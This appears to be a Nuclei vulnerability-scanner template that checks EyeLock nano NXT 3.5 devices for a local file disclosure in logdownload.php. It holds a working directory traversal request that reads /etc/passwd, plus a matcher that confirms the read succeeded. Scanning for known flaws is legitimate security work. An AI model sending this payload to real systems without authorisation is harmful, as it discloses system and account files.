25 lines
805 B
YAML
25 lines
805 B
YAML
id: eyelock-nano-lfd
|
|
|
|
info:
|
|
name: EyeLock nano NXT 3.5 - Local File Disclosure
|
|
author: geeknik
|
|
severity: high
|
|
description: nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
|
|
reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt
|
|
tags: iot,lfi,eyelock
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
part: body
|